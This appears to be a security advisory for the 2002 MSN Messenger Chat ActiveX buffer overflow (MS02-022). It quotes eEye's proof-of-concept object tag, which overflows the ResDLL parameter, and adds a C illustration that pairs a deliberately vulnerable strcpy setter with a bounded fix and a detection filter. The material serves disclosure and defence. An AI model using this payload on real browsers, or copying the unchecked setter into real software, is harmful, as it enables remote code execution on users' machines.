Unchecked Buffer in Microsoft MSN Messenger Chat ActiveX Control

Reported May 8, 2002, by eEye Digital Security.

VERSION AFFECTED

· Microsoft MSN Messenger ActiveX Chat Control


DESCRIPTION

A buffer overflow in the MSN Chat ActiveX control used by MSN Messenger (CLSID 9088E688-063A-4806-A3DB-6522712FC061) lets a web page execute arbitrary code on the viewer's machine: the control does not check the length of its ResDLL parameter, and an overlong value overwrites the stack, including the saved return address. Users who have never installed Messenger are exposed as well. An attacker can reference the control through the codebase attribute of the <object> tag, and the browser then prompts the user to download and install it; because Microsoft signs the OLE custom control (OCX), the prompt presents Microsoft's credentials rather than the attacker's. eEye's advisory gives a detailed explanation of this vulnerability.

DEMONSTRATION

eEye Digital Security provided the following example as proof-of-concept:

<object classid="clsid:9088E688-063A-4806-A3DB-6522712FC061" width="455" height="523">
  <param name="_cx" value="12039">
  <param name="_cy" value="13838">
  <param name="BackColor" value="50331647">
  <param name="ForeColor" value="43594547">
  <param name="RedirectURL" value="">
  <!-- ResDLL is the overflowed property; the bracketed note marks the offset at which the saved EIP is overwritten -->
  <param name="ResDLL" value="AAAAAAA[27,257 bytes is where the EIP starts]">
</object>
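The following C program is an added illustration, not code from eEye's advisory or from Microsoft's control. It shows the bug class behind this advisory (a property setter that copies an overlong <param> value into a fixed buffer) next to a bounded setter, and a small content-filter check that flags pages which instantiate the chat control's CLSID with an oversized ResDLL value. The RESDLL_MAX buffer size, every function name and the sample page the program builds are assumptions; only the CLSID and the ResDLL parameter name come from the advisory.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the control's ResDLL property buffer; the advisory gives no
 * size, only that the saved EIP is reached 27,257 bytes into the value. */
#define RESDLL_MAX 256
#define CHAT_CLSID "9088E688-063A-4806-A3DB-6522712FC061"

/* Vulnerable pattern: a property setter copies the attacker-controlled <param>
 * value into a fixed stack buffer with no length check, so a value of
 * RESDLL_MAX bytes or more runs past it and can overwrite the return address. */
int set_resdll_unchecked(const char *value)
{
    char path[RESDLL_MAX];
    strcpy(path, value);              /* unbounded copy: the bug class here */
    return (int)strlen(path);
}

/* Hardened setter: fixed member buffer, length checked before the copy, and
 * path separators rejected because ResDLL should name a DLL, not a path. */
static char g_resdll[RESDLL_MAX];
int set_resdll_checked(const char *value)
{
    size_t n = strlen(value);
    if (n == 0 || n >= sizeof g_resdll) return -1;   /* empty or would not fit */
    if (strpbrk(value, "\\/:") != NULL) return -2;   /* not a bare file name */
    memcpy(g_resdll, value, n + 1);
    return (int)n;
}

/* Case-insensitive substring search: the browser matches attribute names and
 * CLSIDs case-insensitively, so a filter must do the same. */
static const char *ci_strstr(const char *hay, const char *needle)
{
    size_t n = strlen(needle);
    for (; *hay; hay++) {
        size_t i = 0;
        while (i < n && hay[i] &&
               tolower((unsigned char)hay[i]) == tolower((unsigned char)needle[i]))
            i++;
        if (i == n) return hay;
    }
    return NULL;
}

/* Length of the value="..." following <param name="NAME", or -1 if absent. */
long param_value_length(const char *html, const char *name)
{
    char needle[64];
    snprintf(needle, sizeof needle, "name=\"%s\"", name);
    const char *p = ci_strstr(html, needle);
    if (!p) return -1;
    p = ci_strstr(p, "value=\"");
    if (!p) return -1;
    p += strlen("value=\"");
    const char *q = strchr(p, '"');
    return q ? (long)(q - p) : -1;
}

/* Filter verdict: 0 = chat control not referenced; 1 = referenced with ResDLL
 * absent or shorter than RESDLL_MAX; 2 = referenced with an oversized ResDLL. */
int classify_page(const char *html)
{
    if (ci_strstr(html, "clsid:" CHAT_CLSID) == NULL) return 0;
    return param_value_length(html, "ResDLL") >= RESDLL_MAX ? 2 : 1;
}

/* Constructed page shaped like the eEye PoC with value_len 'A' bytes in ResDLL
 * (a sample built here, not the original PoC). Caller frees the result. */
char *build_sample_page(size_t value_len)
{
    const char *head = "<object classid=\"clsid:" CHAT_CLSID "\">\n"
                       "<param name=\"RedirectURL\" value=\"\">\n"
                       "<param name=\"ResDLL\" value=\"";
    const char *tail = "\">\n</object>\n";
    size_t hl = strlen(head);
    char *page = malloc(hl + value_len + strlen(tail) + 1);
    if (!page) return NULL;
    memcpy(page, head, hl);
    memset(page + hl, 'A', value_len);
    strcpy(page + hl + value_len, tail);
    return page;
}

/* Verdict for a constructed page whose ResDLL value has the given length. */
int demo_verdict(size_t value_len)
{
    char *page = build_sample_page(value_len);
    if (!page) return -1;
    int v = classify_page(page);
    free(page);
    return v;
}

int main(void)
{
    printf("8-byte ResDLL -> verdict %d, 27257-byte ResDLL -> verdict %d\n",
           demo_verdict(8), demo_verdict(27257));
    printf("checked setter: chat.dll=%d  ..\\evil.dll=%d\n",
           set_resdll_checked("chat.dll"), set_resdll_checked("..\\evil.dll"));
    return 0;
}
```

The 27,257-byte offset quoted in the PoC is far beyond any plausible property buffer, so a filter keyed on the CLSID plus an abnormally long ResDLL value catches the PoC without knowing the control's real buffer size; the bounded setter is the shape of fix this bug class needs regardless of the threshold a filter chooses.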
VENDOR RESPONSE

The vendor, Microsoft, has released Security Bulletin MS02-022 to address this vulnerability and recommends that affected users apply the appropriate patch listed in the bulletin.

CREDIT
Discovered by Drew Copley and eEye Digital Security.
